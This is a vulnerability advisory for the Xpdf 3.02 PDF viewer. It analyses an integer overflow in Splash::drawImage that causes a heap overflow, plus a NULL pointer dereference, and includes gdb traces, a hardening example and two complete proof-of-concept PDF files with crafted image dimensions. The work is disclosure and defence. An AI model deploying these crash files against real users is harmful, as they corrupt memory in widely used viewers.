Name: Xpdf - Integer overflow which causes heap overflow and NULL pointer dereference
Author: Adam Zabrocki / HISPASEC ( or )
Date: July 06, 2009


Issue:

Xpdf allows local and remote attackers to overflow a heap buffer via an integer overflow vulnerability.
Xpdf is also prone to a NULL pointer dereference.


Description:

Xpdf is an open-source viewer for Portable Document Format (PDF) files. The Xpdf project also includes
a PDF text extractor, a PDF-to-PostScript converter, and various other utilities. Xpdf runs under
the X Window System on UNIX, VMS, and OS/2. The non-X components (pdftops, pdftotext, etc.) also
run on Win32 systems and should run on pretty much any system with a decent C++ compiler.
Xpdf is designed to be small and efficient. It can use Type 1, TrueType, or standard X fonts.


Details:


Let's look at the code:

"./goo/gmem.cc"
void *gmalloc(int size) GMEM_EXCEP {
#ifdef DEBUG_MEM
  ...
#else
  void *p;

  if (size < 0) {
#if USE_EXCEPTIONS
    ...
#else
    fprintf(stderr, "Invalid memory allocation size\n");
    exit(1);
#endif
  }
  if (size == 0) {
    return NULL;
  }
  if (!(p = malloc(size))) {
#if USE_EXCEPTIONS
    ...
#else
    fprintf(stderr, "Out of memory\n");
    exit(1);
#endif
  }
  return p;
#endif
}

Ok. So if we pass a negative value to gmalloc(), xpdf finishes its work via an exit() call
and prints "Invalid memory allocation size\n" to stderr. If we pass 0 (zero),
the function returns NULL. In all other cases there is a normal call to malloc().

Ok, so let's look further.

"./splash/Splash.cc"
SplashError Splash::drawImage(SplashImageSource src, void *srcData,
                              SplashColorMode srcMode, GBool srcAlpha,
                              int w, int h, SplashCoord *mat) {
  ...
  ...
  SplashClipResult clipRes, clipRes2;
  int yp, yq, yt, yStep, lastYStep;
  int xp, xq, xt, xStep, xSrc;
  ...
  SplashColorPtr colorBuf, p;
  ...
#if SPLASH_CMYK
  int pixAcc0, pixAcc1, pixAcc2, pixAcc3;
#else
  int pixAcc0, pixAcc1, pixAcc2;
#endif
  ...
  int nComps, n, m, i, j;

  ...
  // check color modes
  ok = gFalse; // make gcc happy
  nComps = 0; // make gcc happy
  switch (bitmap->mode) {
  case splashModeMono1:
  case splashModeMono8:
    ok = srcMode == splashModeMono8;
    nComps = 1;
    break;
  case splashModeRGB8:
    ok = srcMode == splashModeRGB8;
    nComps = 3;
    break;
  case splashModeBGR8:
    ok = srcMode == splashModeBGR8;
    nComps = 3;
    break;
#if SPLASH_CMYK
  case splashModeCMYK8:
    ok = srcMode == splashModeCMYK8;
    nComps = 4;
    break;
#endif
  }
  if (!ok) {
    return splashErrModeMismatch;
  }
  ...
  ...

  // compute Bresenham parameters for x and y scaling
  yp = h / scaledHeight;
  yq = h % scaledHeight;
  xp = w / scaledWidth;
  xq = w % scaledWidth;

  colorBuf = (SplashColorPtr)gmalloc((yp + 1) * w * nComps);   <- [1] !!!
  if (srcAlpha) {
    alphaBuf = (Guchar *)gmalloc((yp + 1) * w);
  } else {
    alphaBuf = NULL;
  }

  pixAcc0 = pixAcc1 = pixAcc2 = 0; // make gcc happy

  ...
  ...

  if (srcAlpha) {

    ...

    ...
  } else {

    // init y scale Bresenham
    yt = 0;
    lastYStep = 1;

    for (y = 0; y < scaledHeight; ++y) {

      // y scale Bresenham
      yStep = yp;
      yt += yq;
      if (yt >= scaledHeight) {
        yt -= scaledHeight;
        ++yStep;
      }

      // read row(s) from image
      n = (yp > 0) ? yStep : lastYStep;
      if (n > 0) {
        p = colorBuf;
        for (i = 0; i < n; ++i) {
          (*src)(srcData, p, NULL);   <- [!!] !!!
          p += w * nComps;
        }
      }

      ...

      ...

      switch (srcMode) {

      ...
      ...

      case splashModeRGB8:
      case splashModeBGR8:
        for (x = 0; x < scaledWidth; ++x) {

          // x scale Bresenham
          xStep = xp;
          xt += xq;
          if (xt >= scaledWidth) {
            xt -= scaledWidth;
            ++xStep;
          }

          ...
          ...

          // compute the filtered pixel at (x,y) after the x and y scaling
          // operations
          m = xStep > 0 ? xStep : 1;
          p = colorBuf + xSrc * 3;   <- [2] !!!
          pixAcc0 = pixAcc1 = pixAcc2 = 0;
          for (i = 0; i < n; ++i) {
            for (j = 0; j < m; ++j) {
              pixAcc0 += *p++;   <- [3] !!!
              pixAcc1 += *p++;
              pixAcc2 += *p++;
            }
            p += 3 * (w - m);
          }

          ...
          ...

  ...
  ...
}


We control the variables "w" and "h" directly. So let's set variable "w" to zero (0).
After that the call to gmalloc() in [1] returns NULL. The returned value is never checked!
So in [2] we have p = NULL + xSrc*3, and xSrc can be set to 0 (zero) too. So in fact we can set "p"
to NULL. In [3] we have a NULL pointer dereference!

Ok, let's look at the other scenario. What happens if variable "w" has a BIG value? Let's look:

(yp + 1) * w * nComps

"w" we control directly, "nComps" has some static value, and "yp" we control indirectly
because:

yp = h / scaledHeight;

"h" we once again control directly! So in fact we can cause an integer overflow and allocate less memory
than there should be. For example:

h = 2000000000
w = 1102
nComps = 3
yp = h / scaledHeight = 15873015, for the standard scaledHeight = 126

so it should be => (15873015+1)*1102*3 = 15873016*1102*3 = 52476190896
but in fact after the integer overflow it is:
(yp[15873015]+1)*w[1102]*nComps[3] = 936583344

So it is too little :)
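The arithmetic above can be checked mechanically. The following C program is an added example and is not Xpdf's own code: it reproduces the wrapped (yp + 1) * w * nComps computation with the advisory's values, shows how many rows the drawImage row loop can write before it runs off the end of the undersized buffer, and puts an overflow-checked version of the size computation beside it, which also rejects the w == 0 case that makes gmalloc() return an unchecked NULL. The function names wrapped_color_buf_size, checked_color_buf_size and rows_that_fit are the example's own; nothing of that name exists in Xpdf 3.02.

```c
#include <limits.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

/* Reproduces the size computation (yp + 1) * w * nComps from Splash::drawImage
 * with the same 32-bit wrap-around the original int arithmetic has. The math is
 * done in uint32_t so the wrap is well-defined rather than undefined behaviour.
 * Returns the (possibly wrapped) value that would be handed to gmalloc(). */
int32_t wrapped_color_buf_size(int h, int w, int nComps, int scaledHeight)
{
    int yp = h / scaledHeight;                               /* y scale Bresenham step */
    uint32_t rows = (uint32_t)yp + 1u;
    uint32_t bytes = rows * (uint32_t)w * (uint32_t)nComps;  /* wraps mod 2^32 */
    return (int32_t)bytes;
}

/* Hardened replacement for the size computation (example code, not an Xpdf
 * patch): every multiplication is checked against overflow and the result must
 * fit the int that gmalloc() accepts. A zero or negative dimension is rejected
 * outright, which removes the w == 0 case where gmalloc() returns NULL and the
 * caller never checks for it. Returns 1 and stores the size in *out on
 * success, 0 otherwise. */
int checked_color_buf_size(int h, int w, int nComps, int scaledHeight, size_t *out)
{
    size_t rows, row_bytes, total;

    if (h <= 0 || w <= 0 || nComps <= 0 || scaledHeight <= 0)
        return 0;

    rows = (size_t)(h / scaledHeight) + 1;

    /* w * nComps */
    if ((size_t)w > SIZE_MAX / (size_t)nComps)
        return 0;
    row_bytes = (size_t)w * (size_t)nComps;

    /* rows * (w * nComps) */
    if (rows > SIZE_MAX / row_bytes)
        return 0;
    total = rows * row_bytes;

    /* gmalloc(int) cannot represent anything larger than INT_MAX */
    if (total > (size_t)INT_MAX)
        return 0;

    *out = total;
    return 1;
}

/* How many full image rows of w * nComps bytes fit into an allocation of
 * alloc bytes. The row loop in drawImage writes n rows (n == yp in the
 * advisory's trace), so every row index at or beyond this value lands past
 * the end of colorBuf. */
size_t rows_that_fit(size_t alloc, int w, int nComps)
{
    size_t row_bytes = (size_t)w * (size_t)nComps;
    return row_bytes == 0 ? 0 : alloc / row_bytes;
}

int main(void)
{
    /* Values taken from the advisory: constructed test input, not a real image. */
    const int h = 2000000000, w = 1102, nComps = 3, scaledHeight = 126;
    size_t safe = 0;

    int32_t wrapped = wrapped_color_buf_size(h, w, nComps, scaledHeight);
    printf("wrapped size passed to gmalloc: %d bytes\n", wrapped);
    printf("rows the loop writes: %d, rows that fit: %zu\n",
           h / scaledHeight, rows_that_fit((size_t)wrapped, w, nComps));

    if (!checked_color_buf_size(h, w, nComps, scaledHeight, &safe))
        printf("checked size: rejected (overflow)\n");
    if (!checked_color_buf_size(h, 0, nComps, scaledHeight, &safe))
        printf("checked size with w == 0: rejected\n");
    if (checked_color_buf_size(126, 10, nComps, scaledHeight, &safe))
        printf("checked size for a sane image: %zu bytes\n", safe);
    return 0;
}
```

With the advisory's values the wrapped size is 936583344 bytes, which holds only 283298 rows of 3306 bytes, while the row loop tries to write 15873015 rows; the checked version refuses the allocation before any buffer exists.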

In this scenario, after the call to gmalloc() the program continues a few instructions later to the code in [!!].
In fact this is a call through a function pointer which redirects us to the function...


"xpdf/SplashOutputDev.cc"
GBool SplashOutputDev::imageSrc(void *data, SplashColorPtr colorLine,
                                Guchar *alphaLine) {
  SplashOutImageData *imgData = (SplashOutImageData *)data;
  ...
  SplashColorPtr q, col;
  ...
  int nComps, x;

  ...

  if (imgData->lookup) {
    switch (imgData->colorMode) {
    ...
    ...
    case splashModeRGB8:
    case splashModeBGR8:
      for (x = 0, p = imgData->imgStr->getLine(), q = colorLine;
           x < imgData->width;
           ++x, p += nComps) {
        imgData->colorMap->getRGB(p, &rgb);
        *q++ = colToByte(rgb.r);
        *q++ = colToByte(rgb.g);
        *q++ = colToByte(rgb.b);
      }
      break;
    ...
    ...
}

And here is the overflow! We have too little allocated memory, but the program doesn't know about it
and tries to convert the colors and write into this memory via:

*q++ = colToByte(rgb.r);
*q++ = colToByte(rgb.g);
*q++ = colToByte(rgb.b);

and the loop only terminates on this compare:

x < imgData->width;

So we overflow the memory.




Proof of concept

Let's try this scenario:
[root@pi3book xpdf-3.02]# xpdf elo.pdf
Error: PDF file is damaged - attempting to reconstruct xref table...
Naruszenie ochrony pamięci
[root@pi3book xpdf-3.02]#

and gdb output:

(gdb) bt
#0 0x080c222a in SplashOutputDev::imageSrc (data=0xbfffec84, colorLine=0xb7fe46de '�' ..., alphaLine=0x0) at SplashOutputDev.cc:1848
#1 0x080fedc0 in Splash::drawImage (this=0x81e5878, src=0x80c20d0 , srcData=0xbfffec84,
srcMode=splashModeRGB8, srcAlpha=0, w=1102, h=2000000000, mat=0xbfffec50) at Splash.cc:2532
#2 0x080c1d1f in SplashOutputDev::drawImage (this=0x81bd0f8, state=0x81f0050, ref=0xbfffeebc, str=0x81f0960, width=1102, height=2000000000,
colorMap=0x81f8ea0, maskColors=0x0, inlineImg=0) at SplashOutputDev.cc:2048
#3 0x080601d9 in Gfx::doImage (this=0x81e5528, ref=0xbfffeebc, str=0x81f0960, inlineImg=0) at Gfx.cc:3657
#4 0x08066799 in Gfx::opXObject (this=0x81e5528, args=0xbfffef34, numArgs=1) at Gfx.cc:3330
#5 0x080612bd in Gfx::go (this=0x81e5528, topLevel=1) at Gfx.cc:581
#6 0x080615ea in Gfx::display (this=0x81e5528, obj=0xbffff1ac, topLevel=1) at Gfx.cc:553
#7 0x080a55cb in Page::displaySlice (this=0x81df9f0, out=0x81bd0f8, hDPI=90, vDPI=90, rotate=0, useMediaBox=0, crop=1, sliceX=0, sliceY=0, sliceW=744,
sliceH=1052, printing=0, catalog=0x81de638, abortCheckCbk=0, abortCheckCbkData=0x0) at Page.cc:317
#8 0x080aa485 in PDFCore::needTile (this=0x81bcab8, page=0x81e5468, x=0, y=0) at PDFCore.cc:835
#9 0x080abc77 in PDFCore::update (this=0x81bcab8, topPageA=1, scrollXA=0, scrollYA=0, zoomA=125, rotateA=0, force=1, addToHist=1) at PDFCore.cc:658
#10 0x080de837 in XPDFCore::update (this=0x81bcab8, topPageA=1, scrollXA=0, scrollYA=0, zoomA=125, rotateA=0, force=1, addToHist=1) at XPDFCore.cc:285
#11 0x080a6861 in PDFCore::displayPage (this=0xbfffe88c, topPageA=1, zoomA=125, rotateA=0, scrollToTop=1, addToHist=1) at PDFCore.cc:292
#12 0x080ea80a in XPDFViewer (this=0x81a35f8, appA=0x8180298, fileName=0x8182b00, pageA=1, destName=0x0, fullScreen=0, ownerPassword=0x0, userPassword=0x0)
at XPDFViewer.cc:297
#13 0x080dafe0 in XPDFApp::open (this=0x8180298, fileName=0x8182b00, page=1, ownerPassword=0x0, userPassword=0x0) at XPDFApp.cc:228
#14 0x080edcbb in main (argc=Cannot access memory at address 0x0
) at xpdf.cc:311
(gdb) x/i $eip
0x80c222a <_ZN15SplashOutputDev8imageSrcEPvPhS1_+346>: mov %al,0x1(%ebx)
(gdb) i r ebx
ebx 0xb7fe4fff -1208070145
(gdb) x/x $ebx
0xb7fe4fff: Cannot access memory at address 0xb7fe4fff
(gdb) print q
$1 = (Guchar *) 0xb7fe4fff "�"
(gdb) print x
$2 = 780
(gdb) print ((SplashOutImageData *)data)->width
$3 = 1102
(gdb) up
#1 0x080fedc0 in Splash::drawImage (this=0x81e5878, src=0x80c20d0 , srcData=0xbfffec84,
srcMode=splashModeRGB8, srcAlpha=0, w=1102, h=2000000000, mat=0xbfffec50) at Splash.cc:2532
2532 (*src)(srcData, p, NULL);
(gdb) print colorBuf
$4 = (
SplashColorPtr) 0x7ffae008 "\204��a\210�a\210�a\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210"...
(gdb) print w
$5 = 1102
(gdb) print h
$6 = 2000000000
(gdb) print nComps
$7 = 3
(gdb) list
2527 // read row(s) from image
2528 n = (yp > 0) ? yStep : lastYStep;
2529 if (n > 0) {
2530 p = colorBuf;
2531 for (i = 0; i < n; ++i) {
2532 (*src)(srcData, p, NULL);
2533 p += w * nComps;
2534 }
2535 }
2536 lastYStep = yStep;
(gdb) print n
$8 = 15873015
(gdb) print p
$9 = (Guchar *) 0xb7fe46de '�' ...
(gdb)

So it is exactly what we found in the source analysis :) Now look what happens when variable "w" has value 0 (zero) - in fact
now we get the NULL pointer dereference. Let's look:

[root@pi3book xpdf-3.02]# xpdf jajo.pdf
Error: PDF file is damaged - attempting to reconstruct xref table...
Naruszenie ochrony pamięci (core dumped)
[root@pi3book xpdf-3.02]#

and gdb output:

(gdb) bt
#0 Splash::drawImage (this=0x81e58e0, src=0x80c20d0 , srcData=0xbfffec84,
srcMode=splashModeRGB8, srcAlpha=0, w=0, h=2000000000, mat=0xbfffec50) at Splash.cc:2667
#1 0x080c1d1f in SplashOutputDev::drawImage (this=0x81bd100, state=0x81f0090, ref=0xbfffeebc, str=0x81f09c0, width=0, height=2000000000,
colorMap=0x81f8f00, maskColors=0x0, inlineImg=0) at SplashOutputDev.cc:2048
#2 0x080601d9 in Gfx::doImage (this=0x81e54c8, ref=0xbfffeebc, str=0x81f09c0, inlineImg=0) at Gfx.cc:3657
#3 0x08066799 in Gfx::opXObject (this=0x81e54c8, args=0xbfffef34, numArgs=1) at Gfx.cc:3330
#4 0x080612bd in Gfx::go (this=0x81e54c8, topLevel=1) at Gfx.cc:581
#5 0x080615ea in Gfx::display (this=0x81e54c8, obj=0xbffff1ac, topLevel=1) at Gfx.cc:553
#6 0x080a55cb in Page::displaySlice (this=0x81dfa08, out=0x81bd100, hDPI=90, vDPI=90, rotate=0, useMediaBox=0, crop=1, sliceX=0, sliceY=0, sliceW=744,
sliceH=1052, printing=0, catalog=0x81de718, abortCheckCbk=0, abortCheckCbkData=0x0) at Page.cc:317
#7 0x080aa485 in PDFCore::needTile (this=0x81bcac0, page=0x81e5408, x=0, y=0) at PDFCore.cc:835
#8 0x080abc77 in PDFCore::update (this=0x81bcac0, topPageA=1, scrollXA=0, scrollYA=0, zoomA=125, rotateA=0, force=1, addToHist=1) at PDFCore.cc:658
#9 0x080de837 in XPDFCore::update (this=0x81bcac0, topPageA=1, scrollXA=0, scrollYA=0, zoomA=125, rotateA=0, force=1, addToHist=1) at XPDFCore.cc:285
#10 0x080a6861 in PDFCore::displayPage (this=0x0, topPageA=1, zoomA=125, rotateA=0, scrollToTop=1, addToHist=1) at PDFCore.cc:292
#11 0x080ea80a in XPDFViewer (this=0x81a35f8, appA=0x8180298, fileName=0x8182b00, pageA=1, destName=0x0, fullScreen=0, ownerPassword=0x0, userPassword=0x0)
at XPDFViewer.cc:297
#12 0x080dafe0 in XPDFApp::open (this=0x8180298, fileName=0x8182b00, page=1, ownerPassword=0x0, userPassword=0x0) at XPDFApp.cc:228
#13 0x080edcbb in main (argc=Cannot access memory at address 0x0
) at xpdf.cc:311
(gdb) print w
$1 = 0
(gdb) print i
$2 = 0
(gdb) print j
$3 = 0
(gdb) print n
$4 = 15873015
(gdb) print m
$5 = 1
(gdb) print p
$6 = (Guchar *) 0x0
(gdb) print pixAcc0
$7 = 0
(gdb) x/i $eip
0x80ff720 <_ZN6Splash9drawImageEPFiPvPhS1_ES0_15SplashColorModeiiiPd+9488>: movzbl (%ebx),%eax
(gdb) i r ebx
ebx 0x0 0
(gdb) x/x $ebx
0x0: Cannot access memory at address 0x0
(gdb)

That's all. Everything is exactly as we analysed.

[1] - NULL pointer dereference:

-------------- xpdf-poc-null-pointer-dereference.pdf -------------
%PDF-1.3
% 'BasicFonts': class PDFDictionary
1 0 obj
% The standard fonts dictionary
<< /F1 2 0 R >>
endobj
% 'F1': class PDFType1Font
2 0 obj
% Font Helvetica
<< /BaseFont /Helvetica
/Encoding /WinAnsiEncoding
/Name /F1
/Subtype /Type1
/Type /Font >>
endobj
% 'FormXob.322a89588a84510d9b1b6ec68c3b4437': class PDFImageXObject
3 0 obj
<< /BitsPerComponent 8
/ColorSpace /DeviceRGB
/Filter [ /ASCII85Decode
/FlateDecode ]
/Height 2000000000
/Length 61
/Subtype /Image
/Type /XObject
/Width 0 >>
stream
GarPPGWE%h$j7l8U/endstream

endobj
% 'Page1': class PDFPage
4 0 obj
% Page dictionary
<< /Contents 8 0 R
/MediaBox [ 0
0
595.2756
841.8898 ]
/Parent 7 0 R
/Resources << /Font 1 0 R
/ProcSet [ /PDF
/Text
/ImageB
/ImageC
/ImageI ]
/XObject << /FormXob.322a89588a84510d9b1b6ec68c3b4437 3 0 R >> >>
/Rotate 0
/Trans << >>
/Type /Page >>
endobj
% 'R5': class PDFCatalog
5 0 obj
% Document Root
<< /Outlines 9 0 R
/PageMode /UseNone
/Pages 7 0 R
/Type /Catalog >>
endobj
% 'R6': class PDFInfo
6 0 obj
<< /Author (anonymous)
/CreationDate (20090525000415)
/Keywords ()
/Producer (ReportLab http://www.reportlab.com)
/Subject (unspecified)
/Title (untitled) >>
endobj
% 'R7': class PDFPages
7 0 obj
% page tree
<< /Count 1
/Kids [ 4 0 R ]
/Type /Pages >>
endobj
% 'R8': class PDFStream
8 0 obj
% page stream
<< /Filter [ /ASCII85Decode
/FlateDecode ]
/Length 137 >>
stream
endstream
">Gap(;0b2&S&-VlomLT2HjNbIbQSsFp1e964@g>'endstream

endobj
% 'R9': class PDFOutlines
9 0 obj
<< /Count 0
/Type /Outlines >>
endobj
xref
0 10
0000000000 65535 f
0000000113 00000 n
0000000209 00000 n
0000000415 00000 n
0000000710 00000 n
0000001052 00000 n
0000001186 00000 n
0000001397 00000 n
0000001502 00000 n
0000001783 00000 n
trailer
<< /ID
% ReportLab generated PDF document -- digest (http://www.reportlab.com)
[(xZ\271\226b\372\015\305\017\211\022\241\262?\243\347) (xZ\271\226b\372\015\305\017\211\022\241\262?\243\347)]

/Info 6 0 R
/Root 5 0 R
/Size 10 >>
startxref
1834
%%EOF
-------------- xpdf-poc-null-pointer-dereference.pdf -------------


[2] - Integer overflow:

-------------- xpdf-poc-integer-overflow.pdf -------------
%PDF-1.3
% 'BasicFonts': class PDFDictionary
1 0 obj
% The standard fonts dictionary
<< /F1 2 0 R >>
endobj
% 'F1': class PDFType1Font
2 0 obj
% Font Helvetica
<< /BaseFont /Helvetica
/Encoding /WinAnsiEncoding
/Name /F1
/Subtype /Type1
/Type /Font >>
endobj
% 'FormXob.322a89588a84510d9b1b6ec68c3b4437': class PDFImageXObject
3 0 obj
<< /BitsPerComponent 8
/ColorSpace /DeviceRGB
/Filter [ /ASCII85Decode
/FlateDecode ]
/Height 2000000000
/Length 61
/Subtype /Image
/Type /XObject
/Width 1102 >>
stream
GarPPGWE%h$j7l8U/endstream

endobj
% 'Page1': class PDFPage
4 0 obj
% Page dictionary
<< /Contents 8 0 R
/MediaBox [ 0
0
595.2756
841.8898 ]
/Parent 7 0 R
/Resources << /Font 1 0 R
/ProcSet [ /PDF
/Text
/ImageB
/ImageC
/ImageI ]
/XObject << /FormXob.322a89588a84510d9b1b6ec68c3b4437 3 0 R >> >>
/Rotate 0
/Trans << >>
/Type /Page >>
endobj
% 'R5': class PDFCatalog
5 0 obj
% Document Root
<< /Outlines 9 0 R
/PageMode /UseNone
/Pages 7 0 R
/Type /Catalog >>
endobj
% 'R6': class PDFInfo
6 0 obj
<< /Author (anonymous)
/CreationDate (20090525000415)
/Keywords ()
/Producer (ReportLab http://www.reportlab.com)
/Subject (unspecified)
/Title (untitled) >>
endobj
% 'R7': class PDFPages
7 0 obj
% page tree
<< /Count 1
/Kids [ 4 0 R ]
/Type /Pages >>
endobj
% 'R8': class PDFStream
8 0 obj
% page stream
<< /Filter [ /ASCII85Decode
/FlateDecode ]
/Length 137 >>
stream
endstream
">Gap(;0b2&S&-VlomLT2HjNbIbQSsFp1e964@g>'endstream

endobj
% 'R9': class PDFOutlines
9 0 obj
<< /Count 0
/Type /Outlines >>
endobj
xref
0 10
0000000000 65535 f
0000000113 00000 n
0000000209 00000 n
0000000415 00000 n
0000000710 00000 n
0000001052 00000 n
0000001186 00000 n
0000001397 00000 n
0000001502 00000 n
0000001783 00000 n
trailer
<< /ID
% ReportLab generated PDF document -- digest (http://www.reportlab.com)
[(xZ\271\226b\372\015\305\017\211\022\241\262?\243\347) (xZ\271\226b\372\015\305\017\211\022\241\262?\243\347)]

/Info 6 0 R
/Root 5 0 R
/Size 10 >>
startxref
1834
%%EOF

-------------- xpdf-poc-integer-overflow.pdf -------------


Greets

Guys from HISPASEC, snoop, thorkill, Piotr Bania, guys from SecurityReason,
#lam3rz@IRCNET and #plhack@IRCNET


Disclaimer

This document and all the information it contains is provided "as is",
without any warranty. The author is not responsible for the
misuse of the information provided in this advisory. The advisory is
provided for educational purposes only.

Permission is hereby granted to redistribute this advisory, providing
that no changes are made and that the copyright notices and
disclaimers remain intact.


Ending words...

That's all. I tested it on version 3.02 with all security patches. Probably all versions
are vulnerable. Thanks and best regards, Adam Zabrocki (pi3 / pi3ki31ny).



Disclosure Timeline

*) 14 October, 2009 - Vendor releases patch
...
...
*) 27 July, 2009 - reply from vendor
*) 23 July, 2009 - contact with vendor
*) 06 July, 2009 - exploit bug and write advisory
*) 04 July, 2009 - found bug



--
http://hispasec.com
http://pi3.com.pl